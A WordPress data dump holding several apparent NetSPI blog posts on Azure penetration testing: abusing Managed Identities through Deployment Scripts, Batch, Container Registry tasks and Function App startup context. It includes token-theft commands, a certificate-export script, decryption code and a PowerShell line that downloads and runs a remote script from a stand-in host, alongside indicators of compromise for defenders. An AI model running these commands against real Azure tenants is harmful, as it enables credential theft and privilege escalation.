Karl Fosaaen
WP_Query Object ( [query] => Array ( [post_type] => Array ( [0] => post [1] => webinars ) [posts_per_page] => -1 [post_status] => publish [meta_query] => Array ( [relation] => OR [0] => Array ( [key] => new_authors [value] => "10" [compare] => LIKE ) [1] => Array ( [key] => new_presenters [value] => "10" [compare] => LIKE ) ) ) [query_vars] => Array ( [post_type] => Array ( [0] => post [1] => webinars ) [posts_per_page] => -1 [post_status] => publish [meta_query] => Array ( [relation] => OR [0] => Array ( [key] => new_authors [value] => "10" [compare] => LIKE ) [1] => Array ( [key] => new_presenters [value] => "10" [compare] => LIKE ) ) [error] => [m] => [p] => 0 [post_parent] => [subpost] => [subpost_id] => [attachment] => [attachment_id] => 0 [name] => [pagename] => [page_id] => 0 [second] => [minute] => [hour] => [day] => 0 [monthnum] => 0 [year] => 0 [w] => 0 [category_name] => [tag] => [cat] => [tag_id] => [author] => [author_name] => [feed] => [tb] => [paged] => 0 [meta_key] => [meta_value] => [preview] => [s] => [sentence] => [title] => [fields] => [menu_order] => [embed] => [category__in] => Array ( ) [category__not_in] => Array ( ) [category__and] => Array ( ) [post__in] => Array ( ) [post__not_in] => Array ( ) [post_name__in] => Array ( ) [tag__in] => Array ( ) [tag__not_in] => Array ( ) [tag__and] => Array ( ) [tag_slug__in] => Array ( ) [tag_slug__and] => Array ( ) [post_parent__in] => Array ( ) [post_parent__not_in] => Array ( ) [author__in] => Array ( ) [author__not_in] => Array ( ) [search_columns] => Array ( ) [ignore_sticky_posts] => [suppress_filters] => [cache_results] => 1 [update_post_term_cache] => 1 [update_menu_item_cache] => [lazy_load_term_meta] => 1 [update_post_meta_cache] => 1 [nopaging] => 1 [comments_per_page] => 50 [no_found_rows] => [order] => DESC ) [tax_query] => WP_Tax_Query Object ( [queries] => Array ( ) [relation] => AND [table_aliases:protected] => Array ( ) [queried_terms] => Array ( ) [primary_table] => wp_posts [primary_id_column] => ID ) [meta_query] => WP_Meta_Query Object ( [queries] => Array ( [0] => Array ( [key] => new_authors [value] => "10" [compare] => LIKE ) [1] => Array ( [key] => new_presenters [value] => "10" [compare] => LIKE ) [relation] => OR ) [relation] => OR [meta_table] => wp_postmeta [meta_id_column] => post_id [primary_table] => wp_posts [primary_id_column] => ID [table_aliases:protected] => Array ( [0] => wp_postmeta ) [clauses:protected] => Array ( [wp_postmeta] => Array ( [key] => new_authors [value] => "10" [compare] => LIKE [compare_key] => = [alias] => wp_postmeta [cast] => CHAR ) [wp_postmeta-1] => Array ( [key] => new_presenters [value] => "10" [compare] => LIKE [compare_key] => = [alias] => wp_postmeta [cast] => CHAR ) ) [has_or_relation:protected] => 1 ) [date_query] => [request] => SELECT wp_posts.ID FROM wp_posts INNER JOIN wp_postmeta ON ( wp_posts.ID = wp_postmeta.post_id ) WHERE 1=1 AND ( ( wp_postmeta.meta_key = 'new_authors' AND wp_postmeta.meta_value LIKE '{b38990e9302de43987518904e17e61d4fd62f019713c6ff8259a5b1362243d04}\"10\"{b38990e9302de43987518904e17e61d4fd62f019713c6ff8259a5b1362243d04}' ) OR ( wp_postmeta.meta_key = 'new_presenters' AND wp_postmeta.meta_value LIKE '{b38990e9302de43987518904e17e61d4fd62f019713c6ff8259a5b1362243d04}\"10\"{b38990e9302de43987518904e17e61d4fd62f019713c6ff8259a5b1362243d04}' ) ) AND wp_posts.post_type IN ('post', 'webinars') AND ((wp_posts.post_status = 'publish')) GROUP BY wp_posts.ID ORDER BY wp_posts.post_date DESC [posts] => Array ( [0] => WP_Post Object ( [ID] => 32110 [post_author] => 10 [post_date] => 2024-03-14 08:00:00 [post_date_gmt] => 2024-03-14 13:00:00 [post_content] =>As Azure penetration testers, we often run into overly permissioned User-Assigned Managed Identities. This type of Managed Identity is a subscription level resource that can be applied to multiple other Azure resources. Once applied to another resource, it allows the resource to utilize the associated Entra ID identity to authenticate and gain access to other Azure resources. These are typically used in cases where Azure engineers want to easily share specific permissions with multiple Azure resources. An attacker, with the correct permissions in a subscription, can assign these identities to resources that they control, and can get access to the permissions of the identity.
When we attempt to escalate our permissions with an available User-Assigned Managed Identity, we can typically choose from one of the following services to attach the identity to:
- Virtual Machines
- Azure Container Registries (ACR)
- Automation Accounts
- Apps Services (including Function) Apps
- Azure Kubernetes Service (AKS)
- Data Factory
- Logic Apps
- Deployment Scripts
Once we attach the identity to the resource, we can then use that service to generate a token (to use with Microsoft APIs) or take actions as that identity within the service. We’ve linked out on the above list to some blogs that show how to use those services to attack Managed Identities.
The last item on that list (Deployment Scripts) is a more recent addition (2023). After taking a look at Rogier Dijkman’s post - “Project Miaow (Privilege Escalation from an ARM template)” – we started making more use of the Deployment Scripts as a method for “borrowing” User-Assigned Managed Identities. We will use this post to expand on Rogier’s blog and show a new MicroBurst function that automates this attack.
TL;DR
- Attackers may get access to a role that allows assigning a Managed Identity to a resource
- Deployment Scripts allow attackers to attach a User-Assigned Managed Identity
- The Managed Identity can be used (via Az PowerShell or AZ CLI) to take actions in the Deployment Scripts container
- Depending on the permissions of the Managed Identity, this can be used for privilege escalation
- We wrote a tool to automate this process
What are Deployment Scripts?
As an alternative to running local scripts for configuring deployed Azure resources, the Azure Deployment Scripts service allows users to run code in a containerized Azure environment. The containers themselves are created as “Container Instances” resources in the Subscription and are linked to the Deployment Script resources. There is also a supporting “*azscripts” Storage Account that gets created for the storage of the Deployment Script file resources. This service can be a convenient way to create more complex resource deployments in a subscription, while keeping everything contained in one ARM template.
In Rogier’s blog, he shows how an attacker with minimal permissions can abuse their Deployment Script permissions to attach a Managed Identity (with the Owner Role) and promote their own user to Owner. During an Azure penetration test, we don’t often need to follow that exact scenario. In many cases, we just need to get a token for the Managed Identity to temporarily use with the various Microsoft APIs.
Automating the Process
In situations where we have escalated to some level of “write” permissions in Azure, we usually want to do a review of available Managed Identities that we can use, and the roles attached to those identities. This process technically applies to both System-Assigned and User-Assigned Managed Identities, but we will be focusing on User-Assigned for this post.
Link to the Script - https://github.com/NetSPI/MicroBurst/blob/master/Az/Invoke-AzUADeploymentScript.ps1
This is a pretty simple process for User-Assigned Managed Identities. We can use the following one-liner to enumerate all of the roles applied to a User-Assigned Managed Identity in a subscription:
Get-AzUserAssignedIdentity | ForEach-Object { Get-AzRoleAssignment -ObjectId $_.PrincipalId }
Keep in mind that the Get-AzRoleAssignment call listed above will only get the role assignments that your authenticated user can read. There is potential that a Managed Identity has permissions in other subscriptions that you don’t have access to. The Invoke-AzUADeploymentScript function will attempt to enumerate all available roles assigned to the identities that you have access to, but keep in mind that the identity may have roles in Subscriptions (or Management Groups) that you don’t have read permissions on.
Once we have an identity to target, we can assign it to a resource (a Deployment Script) and generate tokens for the identity. Below is an overview of how we automate this process in the Invoke-AzUADeploymentScript function:
- Enumerate available User-Assigned Managed Identities and their role assignments
- Select the identity to target
- Generate the malicious Deployment Script ARM template
- Create a randomly named Deployment Script with the template
- Get the output from the Deployment Script
- Remove the Deployment Script and Resource Group Deployment
Since we don’t have an easy way of determining if your current user can create a Deployment Script in a given Resource Group, the script assumes that you have Contributor (Write permissions) on the Resource Group containing the User-Assigned Managed Identity, and will use that Resource Group for the Deployment Script.
If you want to deploy your Deployment Script to a different Resource Group in the same Subscription, you can use the “-ResourceGroup” parameter. If you want to deploy your Deployment Script to a different Subscription in the same Tenant, use the “-DeploymentSubscriptionID” parameter and the “-ResourceGroup” parameter.
Finally, you can specify the scope of the tokens being generated by the function with the “-TokenScope” parameter.
Example Usage:
We have three different use cases for the function:
- Deploy to the Resource Group containing the target User-Assigned Managed Identity
Invoke-AzUADeploymentScript -Verbose
- Deploy to a different Resource Group in the same Subscription
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "ExampleRG"
- Deploy to a Resource Group in a different Subscription in the same tenant
Invoke-AzUADeploymentScript -Verbose -ResourceGroup "OtherExampleRG" -DeploymentSubscriptionID "00000000-0000-0000-0000-000000000000"
*Where “00000000-0000-0000-0000-000000000000” is the Subscription ID that you want to deploy to, and “OtherExampleRG” is the Resource Group in that Subscription.
Additional Use Cases
Outside of the default action of generating temporary Managed Identity tokens, the function allows you to take advantage of the container environment to take actions with the Managed Identity from a (generally) trusted space. You can run specific commands as the Managed Identity using the “-Command” flag on the function. This is nice for obfuscating the source of your actions, as the usage of the Managed Identity will track back to the Deployment Script, versus using generated tokens away from the container.
Below are a couple of potential use cases and commands to use:
- Run commands on VMs
- Create RBAC Role Assignments
- Dump Key Vaults, Storage Account Keys, etc.
Since the function expects string data as the output from the Deployment Script, make sure that you format your “-command” output in the parameter to ensure that your command output is returned.
Example:
Invoke-AzUADeploymentScript -Verbose -Command "Get-AzResource | ConvertTo-Json”
Lastly, if you’re running any particularly complex commands, then you may be better off loading in your PowerShell code from an external source as your “–Command” parameter. Using the Invoke-Expression (IEX) function in PowerShell is a handy way to do this.
Example:
IEX(New-Object System.Net.WebClient).DownloadString(‘https://example.com/DeploymentExec.ps1’) | Out-String
Indicators of Compromise (IoCs)
We’ve included the primary IoCs that defenders can use to identify these attacks. These are listed in the expected chronological order for the attack.
Operation Name | Description |
---|---|
Microsoft.Resources/deployments/validate/action | Validate Deployment |
Microsoft.Resources/deployments/write | Create Deployment |
Microsoft.Resources/deploymentScripts/write | Write Deployment Script |
Microsoft.Storage/storageAccounts/write | Create/Update Storage Account |
Microsoft.Storage/storageAccounts/listKeys/action | List Storage Account Keys |
Microsoft.ContainerInstance/containerGroups/write | Create/Update Container Group |
Microsoft.Resources/deploymentScripts/delete | Delete Deployment Script |
Microsoft.Resources/deployments/delete | Delete Deployment |
It’s important to note the final “delete” items on the list, as the function does clean up after itself and should not leave behind any resources.
Conclusion
While Deployment Scripts and User-Assigned Managed Identities are convenient for deploying resources in Azure, administrators of an Azure subscription need to keep a close eye on the permissions granted to users and Managed Identities. A slightly over-permissioned user with access to a significantly over-permissioned Managed Identity is a recipe for a fast privilege escalation.
References:
- https://learn.microsoft.com/en-us/azure/azure-resource-manager/templates/deployment-script-template
- https://github.com/SecureHats/miaow/tree/main
We’ve recently seen an increased adoption of the Azure Batch service in customer subscriptions. As part of this, we’ve taken some time to dive into each component of the Batch service to help identify any potential areas for misconfigurations and sensitive data exposure. This research time has given us a few key areas to look at in the Azure Batch service, that we will cover in this blog.
TL;DR
- Azure Batch allows for scalable compute job execution
- Think large data sets and High Performance Computing (HPC) applications
- Attackers with Reader access to Batch can:
- Read sensitive data from job outputs
- Gain access to SAS tokens for Storage Account files attached to the jobs
- Attackers with Contributor access can:
- Run jobs on the batch pool nodes
- Generate Managed Identity tokens
- Gather Batch Access Keys for job execution persistence
The Azure Batch service functions as a middle ground between Azure Automation Accounts and a full deployment of an individual Virtual Machine to run compute jobs in Azure. This in-between space allows users of the service to spin up pools that have the necessary resource power, without the overhead of creating and managing a dedicated virtual system. This scalable service is well suited for high performance computing (HPC) applications, and easily integrates with the Storage Account service to support processing of large data sets.
While there is a bit of a learning curve for getting code to run in the Batch service, the added power and scalability of the service can help users run workloads significantly faster than some of the similar Azure services. But as with any Azure service, misconfigurations (or issues with the service itself) can unintentionally expose sensitive information.
Service Background - Pools
The Batch service relies on “Pools” of worker nodes. When the pools are created, there are multiple components you can configure that the worker nodes will inherit. Some important ones are highlighted here:
- User-Assigned Managed Identity
- Can be shared across the pool to allow workers to act as a specific Managed Identity
- Mount configuration
- Using a Storage Account Key or SAS token, you can add data storage mounts to the pool
- Application packages
- These are applications/executables that you can make available to the pool
- Certificates
- This is a feature that will be deprecated in 2024, but it could be used to make certificates available to the pool, including App Registration credentials
The last pool configuration item that we will cover is the “Start Task” configuration. The Start Task is used to set up the nodes in the pool, as they’re spun up.
The “Resource files” for the pool allow you to select blobs or containers to make available for the “Start Task”. The nice thing about the option is that it will generate the Storage Account SAS tokens for you.
While Contributor permissions are required to generate those SAS tokens, the tokens will get exposed to anyone with Reader permissions on the Batch account.
We have reported this issue to MSRC (see disclosure timeline below), as it’s an information disclosure issue, but this is considered expected application behavior. These SAS tokens are configured with Read and List permissions for the container, so an attacker with access to the SAS URL would have the ability to read all of the files in the Storage Account Container. The default window for these tokens is 7 days, so the window is slightly limited, but we have seen tokens configured with longer expiration times.
The last item that we will cover for the pool start task is the “Environment settings”. It’s not uncommon for us to see sensitive information passed into cloud services (regardless of the provider) via environmental variables. Your mileage may vary with each Batch account that you look at, but we’ve had good luck with finding sensitive information in these variables.
Service Background - Jobs
Once a pool has been configured, it can have jobs assigned to it. Each job has tasks that can be assigned to it. From a practical perspective, you can think of tasks as the same as the pool start tasks. They share many of the same configuration settings, but they just define the task level execution, versus the pool level. There are differences in how each one is functionally used, but from a security perspective, we’re looking at the same configuration items (Resource Files, Environment Settings, etc.).
Generating Managed Identity Tokens from Batch
With Contributor rights on the Batch service, we can create new (or modify existing) pools, jobs, and tasks. By modifying existing configurations, we can make use of the already assigned Managed Identities.
If there’s a User Assigned Managed Identity that you’d like to generate tokens for, that isn’t already used in Batch, your best bet is to create a new pool. Keep in mind that pool creation can be a little difficult. When we started investigating the service, we had to request a pool quota increase just to start using the service. So, keep that in mind if you’re thinking about creating a new pool.
To generate Managed Identity Tokens with the Jobs functionality, we will need to create new tasks to run under a job. Jobs need to be in an “Active” state to add a new task to an existing job. Jobs that have already completed won’t let you add new tasks.
In any case, you will need to make a call to the IMDS service, much like you would for a typical Virtual Machine, or a VM Scale Set Node.
(Invoke-WebRequest -Uri ‘http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/’ -Method GET -Headers @{Metadata=”true”} -UseBasicParsing).Content
To make Managed Identity token generation easier, we’ve included some helpful shortcuts in the MicroBurst repository - https://github.com/NetSPI/MicroBurst/tree/master/Misc/Shortcuts
If you’re new to escalating with Managed Identities in Azure, here are a few posts that will be helpful:
- Azure Privilege Escalation Using Managed Identities - NetSPI
- Mistaken Identity: Extracting Managed Identity Credentials from Azure Function
Apps - NetSPI - Managed Identity Attack Paths, Part 1: Automation Accounts – Andy Robbins, SpecterOps
Alternatively, you may also be able to directly access the nodes in the pool via RDP or SSH. This can be done by navigating the Batch resource menus into the individual nodes (Batch Account -> Pools -> Nodes -> Name of the Node -> Connect). From here, you can generate credentials for a local user account on the node (or use an existing user) and connect to the node via SSH or RDP.
Once you’ve authenticated to the node, you will have full access to generate tokens and access files on the host.
Exporting Certificates from Batch Nodes
While this part of the service is being deprecated (February 29, 2024), we thought it would be good to highlight how an attacker might be able to extract certificates from existing node pools. It’s unclear how long those certificates will stick around after they’ve been deprecated, so your mileage may vary.
If there are certificates configured for the Pool, you can review them in the pool settings.
Once you have the certificate locations identified (either CurrentUser or LocalMachine), appropriately modify and use the following commands to export the certificates to Base64 data. You can run these commands via tasks, or by directly accessing the nodes.
$mypwd = ConvertTo-SecureString -String "TotallyNotaHardcodedPassword..." -Force -AsPlainText Get-ChildItem -Path cert:\currentUser\my\| ForEach-Object{ try{ Export-PfxCertificate -cert $_.PSPath -FilePath (-join($_.PSChildName,'.pfx')) -Password $mypwd | Out-Null [Convert]::ToBase64String([IO.File]::ReadAllBytes((-join($PWD,'\',$_.PSChildName,'.pfx')))) remove-item (-join($PWD,'\',$_.PSChildName,'.pfx')) } catch{} }
Once you have the Base64 versions of the certificates, set the $b64 variable to the certificate data and use the following PowerShell code to write the file to disk.
$b64 = “MII…[Your Base64 Certificate Data]” [IO.File]::WriteAllBytes("$PWD\testCertificate.pfx",[Convert]::FromBase64String($b64))
Note that the PFX certificate uses "TotallyNotaHardcodedPassword..." as a password. You can change the password in the first line of the extraction code.
Automating Information Gathering
Since we are most commonly assessing an Azure environment with the Reader role, we wanted to automate the collection of a few key Batch account configuration items. To support this, we created the “Get-AzBatchAccountData” function in MicroBurst.
The function collects the following information:
- Pools Data
- Environment Variables
- Start Task Commands
- Available Storage Container URLs
- Jobs Data
- Environment Variables
- Tasks (Job Preparation, Job Manager, and Job Release)
- Jobs Sub-Tasks
- Available Storage Container URLs
- With Contributor Level Access
- Primary and Secondary Keys for Triggering Jobs
While I’m not a big fan of writing output to disk, this was the cleanest way to capture all of the data coming out of available Batch accounts.
Tool Usage:
Authenticate to the Az PowerShell module (Connect-AzAccount), import the “Get-AzBatchAccountData.ps1” function from the MicroBurst Repo, and run the following command:
PS C:\> Get-AzBatchAccountData -folder BatchOutput -Verbose VERBOSE: Logged In as kfosaaen@example.com VERBOSE: Dumping Batch Accounts from the "Sample Subscription" Subscription VERBOSE: 1 Batch Account(s) Enumerated VERBOSE: Attempting to dump data from the testspi account VERBOSE: Attempting to dump keys VERBOSE: 1 Pool(s) Enumerated VERBOSE: Attempting to dump pool data VERBOSE: 13 Job(s) Enumerated VERBOSE: Attempting to dump job data VERBOSE: Completed dumping of the testspi account
This should create an output folder (BatchOutput) with your output files (Jobs, Keys, Pools). Depending on your permissions, you may not be able to dump the keys.
Conclusion
As part of this research, we reached out to MSRC on the exposure of the Container Read/List SAS tokens. The issue was initially submitted in June of 2023 as an information disclosure issue. Given the low priority of the issue, we followed up in October of 2023. We received the following email from MSRC on October 27th, 2023:
We determined that this behavior is considered to be 'by design'. Please find the notes below.
Analysis Notes: This behavior is as per design. Azure Batch API allows for the user to provide a set of urls to storage blobs as part of the API. Those urls can either be public storage urls, SAS urls or generated using managed identity. None of these values in the API are treated as “private”. If a user has permissions to a Batch account then they can view these values and it does not pose a security concern that requires servicing.
In general, we’re not seeing a massive adoption of Batch accounts in Azure, but we are running into them more frequently and we’re finding interesting information. This does seem to be a powerful Azure service, and (potentially) a great one to utilize for escalations in Azure environments.
References:
[post_title] => Extracting Sensitive Information from the Azure Batch Service [post_excerpt] => The added power and scalability of Batch Service helps users run workloads significantly faster, but misconfigurations can unintentionally expose sensitive data. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => extracting-sensitive-information-from-azure-batch-service [to_ping] => [pinged] => [post_modified] => 2024-02-28 10:41:26 [post_modified_gmt] => 2024-02-28 16:41:26 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31943 [menu_order] => 12 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [2] => WP_Post Object ( [ID] => 31693 [post_author] => 10 [post_date] => 2024-01-04 09:00:00 [post_date_gmt] => 2024-01-04 15:00:00 [post_content] =>In the ever-evolving landscape of containerized applications, Azure Container Registry (ACR) is one of the more commonly used services in Azure for the management and deployment of container images. ACR not only serves as a secure and scalable repository for Docker images, but also offers a suite of powerful features to streamline management of the container lifecycle. One of those features is the ability to run build and configuration scripts through the "Tasks" functionality.
This functionality does have some downsides, as it can be abused by attackers to generate tokens for any Managed Identities that are attached to the ACR. In this blog post, we will show the processes used to create a malicious ACR task that can be used to export tokens for Managed Identities attached to an ACR. We will also show a new tool within MicroBurst that can automate this whole process for you.
TL;DR
- Azure Container Registries (ACRs) can have attached Managed Identities
- Attackers can create malicious tasks in the ACR that generate and export tokens for the Managed Identities
- We've created a tool in MicroBurst (Invoke-AzACRTokenGenerator) that automates this attack path
Previous Research
To be fully transparent, this blog and tooling was a result of trying to replicate some prior research from Andy Robbins (Abusing Azure Container Registry Tasks) that was well documented, but lacked copy and paste-able commands that I could use to recreate the attack. While the original blog focuses on overwriting existing tasks, we will be focusing on creating new tasks and automating the whole process with PowerShell. A big thank you to Andy for the original research, and I hope this tooling helps others replicate the attack.
Attack Process Overview
Here is the general attack flow that we will be following:
- The attacker has Contributor (Write) access on the ACR
- Technically, you could also poison existing ACR task files in a GitHub repo, but the previous research (noted above) does a great job of explaining that issue
- The attacker creates a malicious YAML task file
- The task authenticates to the Az CLI as the Managed Identity, then generates a token
- A Task is created with the AZ CLI and the YAML file
- The Task is run in the ACR Task container
- The token is written to the Task output, then retrieved by the attacker
If you want to replicate the attack using the AZ CLI, use the following steps:
- Authenticate to the AZ CLI (AZ Login) with an account with the Contributor role on the ACR
- Identify the available Container Registries with the following command:
az acr list
- Write the following YAML to a local file (.\taskfile)
version: v1.1.0
steps:
- cmd: az login --identity --allow-no-subscriptions
- cmd: az account get-access-token
- Note that this assumes you are using a System Assigned Managed Identity, if you're using a User-Assigned Managed Identity, you will need to add a "--username <client_id|object_id|resource_id>" to the login command
- Create the task in the ACR ($ACRName) with the following command
az acr task create --registry $ACRName --name sample_acr_task --file .\taskfile --context /dev/null --only-show-errors --assign-identity [system]
- If you're using a User-Assigned Managed Identity, replace [system] with the resource path ("/subscriptions/<subscriptionId>/resourcegroups/<myResourceGroup>/providers/
Microsoft.ManagedIdentity/userAssignedIdentities/<myUserAssignedIdentitiy>") for the identity you want to use - Use the following command to run the command in the ACR
az acr task run -n sample_acr_task -r $acrName
- The task output, including the token, should be displayed in the output for the run command.
- Next, we will want to delete the task with the following command
az acr task delete -n sample_acr_task -r $acrName -y
Please note that while the task may be deleted, the "Runs" of the task will still show up in the ACR. Since Managed Identity tokens have a limited shelf-life, this isn't a huge concern, but it would expose the token to anyone with the Reader role on the ACR. If you are concerned about this, feel free to modify the task definition to use another method (HTTP POST) to exfiltrate the token.
Invoke-AzACRTokenGenerator Usage/overview
To automate this process, we added the Invoke-AzACRTokenGenerator function to the MicroBurst toolkit. The function follows the above methodology and uses a mix of the Az PowerShell module cmdlets and REST API calls to replace the AZ CLI commands.
A couple of things to note:
- The function will prompt (via Out-GridView) you for a Subscription to use and for the ACRs that you want to target
- Keep in mind that you can multi-select (Ctrl+click) Subscriptions and ACRs to help exploit multiple targets at once
- By default, the function generates tokens for the "Management" (https://management.azure.com/) service
- If you want to specify a different scope endpoint, you can do so with the -TokenScope parameter.
- Two commonly used options:
- https://graph.microsoft.com/ - Used for accessing the Graph API
- https://vault.azure.net – Used for accessing the Key Vault API
- The Output is a Data Table Object that can be assigned to a variable
- $tokens = Invoke-AzACRTokenGenerator
- This can also be appended with a "+=" to add tokens to the object
- This is handy for storing multiple token scopes (Management, Graph, Vault) in one object
This command will be imported with the rest of the MicroBurst module, but you can use the following command to manually import the function into your PowerShell session:
Import-Module .\MicroBurst\Az\Invoke-AzACRTokenGenerator.ps1
Once imported, the function is simple to use:
Invoke-AzACRTokenGenerator -Verbose
Example Output:
Indicators of Compromise (IoCs)
To better support the defenders out there, we've included some IoCs that you can look for in your Azure activity logs to help identify this kind of attack.
Operation Name | Description |
---|---|
Microsoft.ContainerRegistry/registries/tasks/write | Create or update a task for a container registry. |
Microsoft.ContainerRegistry/registries/scheduleRun/action | Schedule a run against a container registry. |
Microsoft.ContainerRegistry/registries/runs/listLogSasUrl/action | Get the log SAS URL for a run. |
Microsoft.ContainerRegistry/registries/tasks/delete | Delete a task for a container registry. |
Conclusion
The Azure ACR tasks functionality is very helpful for automating the lifecycle of a container, but permissions misconfigurations can allow attackers to abuse attached Managed Identities to move laterally and escalate privileges.
If you’re currently using Azure Container Registries, make sure you review the permissions assigned to the ACRs, along with any permissions assigned to attached Managed Identities. It would also be worthwhile to review permissions on any tasks that you have stored in GitHub, as those could be vulnerable to poisoning attacks. Finally, defenders should look at existing task files to see if there are any malicious tasks, and make sure that you monitor the actions that we noted above.
[post_title] => Automating Managed Identity Token Extraction in Azure Container Registries [post_excerpt] => Learn the processes used to create a malicious Azure Container Registry task that can be used to export tokens for Managed Identities attached to an ACR. [post_status] => publish [comment_status] => closed [ping_status] => closed [post_password] => [post_name] => automating-managed-identity-token-extraction-in-azure-container-registries [to_ping] => [pinged] => [post_modified] => 2024-01-03 15:13:38 [post_modified_gmt] => 2024-01-03 21:13:38 [post_content_filtered] => [post_parent] => 0 [guid] => https://www.netspi.com/?p=31693 [menu_order] => 25 [post_type] => post [post_mime_type] => [comment_count] => 0 [filter] => raw ) [3] => WP_Post Object ( [ID] => 31440 [post_author] => 10 [post_date] => 2023-11-16 09:00:00 [post_date_gmt] => 2023-11-16 15:00:00 [post_content] =>As we were preparing our slides and tools for our DEF CON Cloud Village Talk (What the Function: A Deep Dive into Azure Function App Security), Thomas Elling and I stumbled onto an extension of some existing research that we disclosed on the NetSPI blog in March of 2023. We had started working on a function that could be added to a Linux container-based Function App to decrypt the container startup context that is passed to the container on startup. As we got further into building the function, we found that the decrypted startup context disclosed more information than we had previously realized.
TL;DR
- The Linux containers in Azure Function Apps utilize an encrypted start up context file hosted in Azure Storage Accounts
- The Storage Account URL and the decryption key are stored in the container environmental variables and are available to anyone with the ability to execute commands in the container
- This startup context can be decrypted to expose sensitive data about the Function App, including the certificates for any attached Managed Identities, allowing an attacker to gain persistence as the Managed Identity. As of the November 11, 2023, this issue has been fully addressed by Microsoft.
In the earlier blog post, we utilized an undocumented Azure Management API (as the Azure RBAC Reader role) to complete a directory traversal attack to gain access to the proc file system files. This allowed access to the environmental variables (/proc/self/environ) used by the container. These environmental variables (CONTAINER_ENCRYPTION_KEY and CONTAINER_START_CONTEXT_SAS_URI) could then be used to decrypt the startup context of the container, which included the Function App keys. These keys could then be used to overwrite the existing Function App Functions and gain code execution in the container. At the time of the previous research, we had not investigated the impact of having a Managed Identity attached to the Function App.
As part of the DEF CON Cloud Village presentation preparation, we wanted to provide code for an Azure function that would automate the decryption of this startup context in the Linux container. This could be used as a shortcut for getting access to the function keys in cases where someone has gained command execution in a Linux Function App container, or gained Storage Account access to the supporting code hosting file shares.
Here is the PowerShell sample code that we started with:
using namespace System.Net # Input bindings are passed in via param block. param($Request, $TriggerMetadata) $encryptedContext = (Invoke-RestMethod $env:CONTAINER_START_CONTEXT_SAS_URI).encryptedContext.split(".") $key = [System.Convert]::FromBase64String($env:CONTAINER_ENCRYPTION_KEY) $iv = [System.Convert]::FromBase64String($encryptedContext[0]) $encryptedBytes = [System.Convert]::FromBase64String($encryptedContext[1]) $aes = [System.Security.Cryptography.AesManaged]::new() $aes.Mode = [System.Security.Cryptography.CipherMode]::CBC $aes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7 $aes.Key = $key $aes.IV = $iv $decryptor = $aes.CreateDecryptor() $plainBytes = $decryptor.TransformFinalBlock($encryptedBytes, 0, $encryptedBytes.Length) $plainText = [System.Text.Encoding]::UTF8.GetString($plainBytes) $body = $plainText # Associate values to output bindings by calling 'Push-OutputBinding'. Push-OutputBinding -Name Response -Value ([HttpResponseContext]@{ StatusCode = [HttpStatusCode]::OK Body = $body })
At a high-level, this PowerShell code takes in the environmental variable for the SAS tokened URL and gathers the encrypted context to a variable. We then set the decryption key to the corresponding environmental variable, the IV to the start section of the of encrypted context, and then we complete the AES decryption, outputting the fully decrypted context to the HTTP response.
When building this code, we used an existing Function App in our subscription that had a managed Identity attached to it. Upon inspection of the decrypted startup context, we noticed that there was a previously unnoticed “MSISpecializationPayload” section of the configuration that contained a list of Identities attached to the Function App.
"MSISpecializationPayload": { "SiteName": "notarealfunctionapp", "MSISecret": "57[REDACTED]F9", "Identities": [ { "Type": "SystemAssigned", "ClientId": " b1abdc5c-3e68-476a-9191-428c1300c50c", "TenantId": "[REDACTED]", "Thumbprint": "BC5C431024BC7F52C8E9F43A7387D6021056630A", "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]/", "ResourceId": "", "Certificate": "MIIK[REDACTED]H0A==", "PrincipalId": "[REDACTED]", "AuthenticationEndpoint": null }, { "Type": "UserAssigned", "ClientId": "[REDACTED]", "TenantId": "[REDACTED]", "Thumbprint": "B8E752972790B0E6533EFE49382FF5E8412DAD31", "SecretUrl": "https://control-centralus.identity.azure.net/subscriptions/[REDACTED]", "ResourceId": "/subscriptions/[REDACTED]/Microsoft.ManagedIdentity/userAssignedIdentities/[REDACTED]", "Certificate": "MIIK[REDACTED]0A==", "PrincipalId": "[REDACTED]", "AuthenticationEndpoint": null } ], [Truncated]
In each identity listed (SystemAssigned and UserAssigned), there was a “Certificate” section that contained Base64 encoded data, that looked like a private certificate (starts with “MII…”). Next, we decoded the Base64 data and wrote it to a file. Since we assumed that this was a PFX file, we used that as the file extension.
$b64 = " MIIK[REDACTED]H0A==" [IO.File]::WriteAllBytes("C:\temp\micert.pfx", [Convert]::FromBase64String($b64))
We then opened the certificate file in Windows to see that it was a valid PFX file, that did not have an attached password, and we then imported it into our local certificate store. Investigating the certificate information in our certificate store, we noted that the “Issued to:” GUID matched the Managed Identity’s Service Principal ID (b1abdc5c-3e68-476a-9191-428c1300c50c).
After installing the certificate, we were then able to use the certificate to authenticate to the Az PowerShell module as the Managed Identity.
PS C:\> Connect-AzAccount -ServicePrincipal -Tenant [REDACTED] -CertificateThumbprint BC5C431024BC7F52C8E9F43A7387D6021056630A -ApplicationId b1abdc5c-3e68-476a-9191-428c1300c50c Account SubscriptionName TenantId Environment ------- ---------------- --------- ----------- b1abdc5c-3e68-476a-9191-428c1300c50c Research [REDACTED] AzureCloud
For anyone who has worked with Managed Identities in Azure, you’ll immediately know that this fundamentally breaks the intended usage of a Managed Identity on an Azure resource. Managed Identity credentials are never supposed to be accessed by users in Azure, and the Service Principal App Registration (where you would validate the existence of these credentials) for the Managed Identity isn’t visible in the Azure Portal. The intent of Managed Identities is to grant temporary token-based access to the identity, only from the resource that has the identity attached.
While the Portal UI restricts visibility into the Service Principal App Registration, the details are available via the Get-AzADServicePrincipal Az PowerShell function. The exported certificate files have a 6-month (180 day) expiration date, but the actual credential storage mechanism in Azure AD (now Entra ID) has a 3-month (90 day) rolling rotation for the Managed Identity certificates. On the plus side, certificates are not deleted from the App Registration after the replacement certificate has been created. Based on our observations, it appears that you can make use of the full 3-month life of the certificate, with one month overlapping the new certificate that is issued.
It should be noted that while this proof of concept shows exploitation through Contributor level access to the Function App, any attacker that gained command execution on the Function App container would have been able to execute this attack and gain access to the attached Managed Identity credentials and Function App keys. There are a number of ways that an attacker could get command execution in the container, which we’ve highlighted a few options in the talk that originated this line of research.
Conclusion / MSRC Response
At this point in the research, we quickly put together a report and filed it with MSRC. Here’s what the process looked like:
- 7/12/23 - Initial discovery of the issue and filing of the report with MSRC
